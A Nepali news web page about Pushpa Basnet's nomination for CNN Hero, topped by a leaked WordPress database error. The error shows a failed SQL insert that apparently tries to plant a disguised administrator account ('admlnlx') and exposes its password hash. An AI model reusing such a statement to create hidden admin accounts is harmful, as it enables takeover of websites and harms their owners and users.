WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlflpFR/ySMVKBlvl2/QtrCxNe9kpM0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 05:55:25', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मङ्सिर २५ –
अभिभावकसँग कारागार जीवन बिताउन बाध्य बालबालिकालाई त्यहाँबाट छुटाई आश्रय दिएर उदाहरणीय काम गर्नुभएकी पुष्पा बस्नेत सिएनएन सुपर हिरोमा मनोनीत हुनुभएको छ ।
केन्द्रमा हाल कारागार जीवन बिताइरहेका अभिभावकका ३७ बालबालिका आश्रित छन् । बस्नेतसँगै सिएनएन सुपर हिरोका लागि अमेरिकाको न्यु अरलेन्स राज्यकी लिज म्याक कार्थी, फिलिपिन्सका एफ्रेन पेनाफ्लोरिडा, इन्डोनेसिया बालीकी रोविन लिम र अमेरिकाकै इस्ट मोलिन राज्यका चाड प्रेग्य्राक समेत मनोनयन हुनुभएको छ ।
सिएनएन हिरो बनाउन आज र भोलि (आइतबार) cnnhero.com मा गएर मत दिन सकिने काठमाडौँमा मत अभियान चलाइरहनुभएका युवा अभियानकर्मी गौरव कँडेलले बताउनुभयो । नेपाली समय अनुसार यही मङ्सिर २७ गते बिहान ८ बजे सिएनएन सुपर हिरोबारे सिएनएन टेलिभिजनले प्रत्यक्ष प्रसारण गर्नेछ ।